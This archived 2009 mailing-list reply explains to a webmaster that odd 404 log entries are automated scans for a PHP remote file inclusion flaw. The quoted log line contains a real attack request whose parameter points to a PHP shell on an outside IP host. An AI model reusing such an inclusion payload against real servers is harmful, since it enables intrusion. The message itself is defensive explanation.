WebApp Sec mailing list archives

Re: 404 messages pointing to a strange location

From: Stefan Tanase <stefant () kaspersky ro>
Date: Sat, 03 Jan 2009 19:44:38 +0200

Hello Simon,

Simon wrote:
Yesterday evening I had lots of 404-messages from my web server, all pointing to locations like http://foo.bar/something//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt?

ID3 is a well known PHP shell - PHP shells are scripts used by "bad guys" to gain access to your web server through an exploitable page in your website, for example through a vulnerable include statement.

I don't use paypal or anything similar on my page; what does that mean?

They are usually scanning thousands of web servers in search of the same vulnerabilities. You may not be using those vulnerable scripts (like paypalcart.php in this case) but some other webmasters may do :)

I'm wondering because this messages came in only yesterday before midnight, several dozens.

Popular websites get requests like this 24/7 - it's just a matter of time until your server is found and they start scanning it for vulnerabilities.

It's a good idea to keep an watch on this stuff, so you can make sure your websites are not vulnerable.

Cheers,
--
Stefan TANASE, AV Researcher
Global Research & Analysis Team

Sponsored by: Watchfire Methodologies & Tools for Web Application Security Assessment With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today!
https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F